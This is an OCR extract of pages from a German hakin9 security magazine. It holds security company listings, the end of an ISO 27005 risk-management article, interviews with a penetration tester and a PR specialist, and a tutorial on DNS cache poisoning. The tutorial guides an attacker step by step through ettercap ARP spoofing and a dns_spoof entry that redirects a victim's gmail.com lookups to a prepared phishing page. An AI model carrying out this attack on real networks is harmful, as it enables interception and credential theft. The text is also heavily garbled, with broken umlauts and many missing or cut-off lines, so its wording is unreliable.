Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
nen ARP-Cache nach der MAC-Adresse des Zieles
ab und packt diese danach mit in das Paket
aus und weiss anhand seiner Zuordnungstabelle
das zu dieser MAC-Adresse der Port 1 gehoumlrt wo-
rauf er das Paket an Port 1 und somit an das Ziel
weiterleitet
seines Opfers so veraumlndern dass eine IP-Adresse einer
total neuen beliebigen MAC-Adresse zugeordnet wird
Abbildung 2 Eine Anfrage (rot) an Ziel waumlhrend ARP-Spoofi ng
DNS Cache Poisoning
hakin9orgde 39
Nun gilt es fuumlr den Angreifer darauf zu warten bis das
Opfer den A-Record von gmailcom abfragt Sehen wir
nun in unserem mitgehoumlrten Traffic eine solche Anfra-
ge so muss das Antwortpaket soweit veraumlndert werden
dass anstatt die tatsaumlchliche IP-Adresse nun die IP-Ad-
resse zu unserer praumlparierten Seite uumlbermittelt wird
Das Opfer selbst empfaumlngt und akzeptiert das so
weil es selbst von der Veraumlnderung nichts mitbekommt
Alle Anfragen welche das Opfer von nun an an Gmail
macht werden nicht an Gmail selbst sondern an un-
sere praumlparierte Seite gesandt womit unser Vorhaben
erfuumlllt waumlre
So nun genug Theorie schreiten wir zur Tat
Beide Schritte koumlnnen direkt mit ettercap durchge-
fuumlhrt werden
Dabei handelt es sich um ein Stuumlck Software mit Spe-
zialisierung auf Man-in-the-Middle-Attacken welches
unter der GPL wahlweise fuumlr Windows Linux oder Mac
veroumlffentlicht wurde
Leider wurde es seit einiger Zeit nicht mehr weiter-
entwickelt was sich jedoch nicht auf die Funktionalitaumlt
auswirkt
Ettercap kann wahlweise via GUI oder Konsole be-
dient werden doch erstmal wird alles konfiguriert
Zuerst muumlssen wir unsere eigenen A-Rekords fuumlr
gmailcom anlegen Dazu editieren wir die Datei usr
shareettercapetterdns und erweitern diese um einen
Eintrag wie in Listing 1 dargestellt
Wenn wir nun speichern so haben wir festgelegt
dass Anfragen nach der IP von gmailcom oder gmail
com mit 127001 beantwortet werden sollen
Somit sind wir auch schon bereit und koumlnnen bereits
mit Schritt 1 beginnen
Dazu starten wir ettercap und waumlhlen unter dem
Punkt Sniff den Unterpunkt Unified sniffing aus Dabei
werden wir nach dem Interface gefragt uumlber welches
der Angreifer mit dem Netzwerk des Opfers verbunden
ist Im Falle einer Verbindung via Kabel ist das meist
eth0 bei WLAN meist wlan0
Ist auch das vollbracht so koumlnnen das oder die Ziele
identifiziert werden Dazu waumlhlen wir den Punkt Hosts gt
Scan for hosts wodurch automatisch alle 255 Hosts im
Subnet angepingt werden (Bild 3)
Ist auch das durchgestanden so koumlnnen die Ziele un-
ter Hosts gt Hosts list ausgewaumlhlt werden Als Target 1
muss der Router oder Gateway und das Opfer als Tar-
get 2 ausgewaumlhlt werden Hier muss gegebenenfalls
mit nmap nach gepruumlft werden um die IP des Opfers zu
identifizieren
Nun kann mit dem Selektieren von Mitm gt Arp poiso-
ning die ARP-Attacke gestartet und Schritt 1 somit be-
endet werden
Wird nun Wireshark oder tcpdump gestartet so kann
man allen Netzwerkverkehr des Opfers und des Rou-
ters Gateways mitgehoumlrt werden
Nun gleich weiter zu Schritt 2 Nachdem die Man-in-
the-Middle-Attacke steht koumlnnen wir dem Opfer nun
unsere DNS-Records aufzwingen
Dazu verwenden wir die ettercap-Plugins unter dem
Punkt Plugins gt Manage the plugins Da waumlhlen wir den
Punkt dns_spof aus
Und somit ist unser DNS-Spoofing-Angriff einsatzfauml-
hig und aktiv
Wem als Angreifer kein GUI zur Verfuumlgung steht der
kann auch den interaktiven Modus von ettercap ver-
wenden Dazu muss ettercap nur mit der Option -T auf-
gerufen werden Alles weitere ist dann in der Hilfe (h-
Taste) nachzulesen
Nun ist alles getan Jedes mal wenn nun unser Op-
fer die Webseite von Gmail aufruft wird es auf unsere
praumlparierte Seite umgeleitet ohne dass es davon etwas
merkt
In Kombination mit SET erhaumllt ein Angreifer so muumlhe-
los Zugriff auf ein fremdes System
Listing 1 ein A-Record fuumlr eine praumlparierte Seite von gmailcom
gmailcom A 127001
gmailcom A 127001
Abbildung 3 GTK-GUI von ettercap
Linkshttpseiconch Unternehmen des Autorshttpblogencodingitch
PATRICK SCHMIDDer Autor ist System Engineer im Bereich Linux Unix und unterstuumltzt nebenbei die Entwicklung und Verbreitung von Li-nux und Opensource im privaten wie auch im professionellen Umfeld
Interview mit Tobias Glemser
hakin9orgde 41
hakin9 Erzaumlhlen Sie uns bitte ein wenig uumlber sich selbst wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie sich mit IT-Sicherheit Branche beschaumlftigenTobias Glemser Mein Name ist Tobias Glemser ich bin leitender IT-Sicherheitsberater bei der Tele-Consul-ting security networking training GmbH in Gaumlufelden bei Stuttgart und verantwortlich fuumlr den Geschaumlftsbereich Penetrationstests Zu Schul- und Zivildienstzeiten hatte ich bereits den ersten Kontakt mit technischen Audits und habe schlicht das Hobby zum Beruf gemacht Seit uumlber zehn Jahren bin ich in entsprechenden Projekten taumltig Am Wichtigsten ist der kreative Umgang mit Sys-temen und Anwendungen Funktionen die ein Entwick-ler nach besten Wissen und Gewissen implementiert hat so zu nutzen dass sie nicht mehr dem urspruumlngli-chen Zweck dienen Im Projektumfeld erhaumllt man viele Einblicke in Techniken und Prozesse in unterschiedli-chen Firmen und Behoumlrden z B Energie Flugraum-uumlberwachung Banken Neben den technischen Aspek-ten ist es mein und unser Ziel mit allen Beteiligten des Kunden ein gemeinsames Ziel zu erreichen So waumlre es aus meiner Sicht unsinnig technische Schwachstellen mit rein technischen Hilfestellungen zu beheben Der Ansatz springt deutlich zu kurz Vielmehr geht es auch darum auf Prozesse abzuleiten und diese zu verbes-sern Diese Nachhaltigkeit und die positiven Ruumlckmel-dungen treiben an Daruumlber hinaus bin ich frei in der Beratung d h wir haben keine Produkte im Portfolio die bei einem technischen Audit moumlglichst gleich mit an-gepriesen werden muumlssen
hakin9 Bereits bei mehreren tausend Tests von Netzen und Systemen haben Sie den selbstentwickelten Security Scanner tajanas genutzt Was unterscheidet tajanas von anderen solchen WerkzeugenTobias Glemser Wir haben tajanas zunaumlchst fuumlr ei-gene Zwecke entwickelt und setzten es auch heute als Basis in Penetrationstests ein tajanas ist ein Frame-
work und Webfrontend fuumlr die grundsaumltzliche Pruumlfung eines Systems mit automatisierten Port- und Vulnera-bility-Scans und einheitlichem Reporting pro System Wir haben dabei das Ziel verfolgt nicht das Rad neu zu erfinden sondern etablierte Programme fuumlr die ei-gentlichen Pruumlfungen zu nutzen Die Ergebnisse der einzelnen Schritte werden analog zu einer manuellen Pruumlfung mit den jeweiligen Programmen automatisiert verknuumlpft Dies ermoumlglicht eine wesentliche schnellere Durchfuumlhrung bei gleicher Ergebnis-Qualitaumlt Daruumlber hinaus ist die Oberflaumlche so gehalten dass nur die not-wendigsten Optionen zur Verfuumlgung stehen
Neben der Schwachstellen-Pruumlfung ist auch eine Erreichbarkeitspruumlfung integriert um einen schnellen Uumlberblick uumlber aktive Systeme in Netzen zu erhalten
Es ist wichtig zu verstehen dass Penetrationstests ohne automatisierte Tests nicht funktionieren Die schie-re Anzahl an Schwachstellen laumlsst sich nur sinnvoll mit entsprechenden Programmen pruumlfen Die Ergebnisse sind dann die Basis fuumlr weitere manuelle Tests Dabei wird mit Know-How und Kreativitaumlt versucht weitere Luumlcken zu finden um und diese dann auszunutzen
hakin9 Wie erfolgt die Bedienung des Scanners und welche Lizenzen und Module existierenTobias Glemser Die Bedienung erfolgt vollstaumlndig uumlber eine webbasierte Oberflaumlche tajanas wird als VM-ware- oder Hardware-Appliance ausgeliefert der End-benutzer kann alle Funktionen ndash dazu gehoumlren auch Ak-tualisierungen ndash uumlber die Weboberflaumlche nutzen Jeder Nutzer erhaumllt natuumlrlich trotzdem vollstaumlndigen Root-Zu-griff auf das System Die Lizenzierung erfolgt pro In-stallation eine Limitierung auf IP-Adressen oder eine gewisse Anzahl Scans erfolgt nicht Neben dem Audit-Modul gibt es auch ein Modul fuumlr die Erreichbarkeits-pruumlfung
hakin9 Woher kommt der Name tajanasTobias Glemser tajanas steht fuumlr bdquothis ainrsquot just ano-ther network scannerrdquo ndash weil es ein wie beschrieben ein
bdquoSicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollinstrument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgreichen Produkts gesehen werdenldquoInterview mit Tobias Glemser
10201042
INTERVIEW
Nach der Durchfuumlhrung erhaumllt der Kunde einem umfas-senden auf seine Umgebung und Realitaumlt angepass-ten Ergebnisbericht der im Rahmen eines Abschluss-Workshops mit den technischen verantwortlichen besprochen wird Auf Wunsch erfolgt auch die Darstel-lung vor dem Vorstand bzw der Leitungsebene
Das Spektrum eines Penetrationstests ist sehr viel-faumlltig und laumlsst sich nur schwer darstellen Es handelt sich dabei jedoch nicht zwingend um die bdquobekanntenldquo Pruumlfungen auf Serversysteme Haumlufige Einfallstore fuumlr Angreifer sind schlecht gesicherte lokale Netzwerke Client-Systeme oder auch Multifunktionsdrucker Bei Interesse finden sich Informationen z B in der Studie Penetrationstests des BSI dem Whitepaper Penetrati-
onstests der Tele-Consulting oder auch dem Whitepa-per Projektierung der Sicherheitspruumlfung von Weban-
wendungen der OWASP
hakin9 Welche Plaumlne die IT-Sicherheit Branche betreffend haben Sie noch vorTobias Glemser Abseits von technischen Audits ver-suchen wir ganzheitliche Prozesse vor allem aber nicht nur in den IT-Abteilungen zu etablieren und dabei Ad-ministratoren die Hilfestellungen zu geben die sie da-bei benoumltigen Als Sicherheitsberater oder auch Sicher-heitsbeauftrager eines Unternehmens nimmt man meist die Rolle eines Kontrolleurs ein der darauf achtet dass Regeln eingehalten werden Hier ist ein Wandel erfor-derlich sowohl bei denen die sich bdquoSicherheitldquo auf die Fahnen schreiben als auch bei den Administratoren und Verantwortlichen fuumlr Geschaumlftsbereiche und deren Technik Sicherheit darf nicht erst am Ende von neuen Anwendungen Produkten oder Projekten als Kontrollin-strument einbezogen sondern muss als integraler und vor Allem unterstuumltzender Bestandteil eines erfolgrei-chen Produkts gesehen werden Hier muumlssen auch und vor allem Sicherheitsberater umdenken um vorrangig als Unterstuumltzer die sie sind gesehen und akzeptiert zu werden Nur so begreifen die technisch verantwort-lichen Mitarbeiter Sicherheitspruumlfungen nicht als Pruuml-fungen ihrer persoumlnlichen Kompetenz sondern als kon-krete Unterstuumltzung fuumlr die Verbesserung vorhandener Sicherheitsprozesse
Im Bereich der technischen Schwachstellen werden weiterhin Webanwendungen eine groszlige Rolle spielen Daher bin ich seit geraumer Zeit beim Open Web Appli-cation Security Project (OWASP) den meisten vermut-lich durch die OWASP Top 10 bekannt ehrenamtlich taumltig und seit diesem Jahr im Board der deutschen Sek-tion Beim OWASP Stammtisch Stuttgart (und Stamm-tischen in anderen Staumldten) tauschen sich hier auch Menschen rund um das Thema zwanglos aus Wer Lust hat vorbeizukommen kann sich auf der deutschen OWASP Webseite informieren
Wir bedanken uns fuumlr das Gespraumlch
Framework darstellt und nicht den n-ten Port- oder Vul-nerability-Scanner Wenn wir Bugs in den verwendeten Programmen feststellen oder Ideen fuumlr Erweiterungen haben geben wir diese direkt in die Community zuruumlck
hakin9 Wer sind Benutzer von tajanasTobias Glemser Zum einen natuumlrlich wir selbst Zum anderen setzten IT-Sicherheitsbeauftragte und IT-Revi-soren das Tool fuumlr regelmaumlszligige Sicherheitspruumlfungen ihrer Netze ein
hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
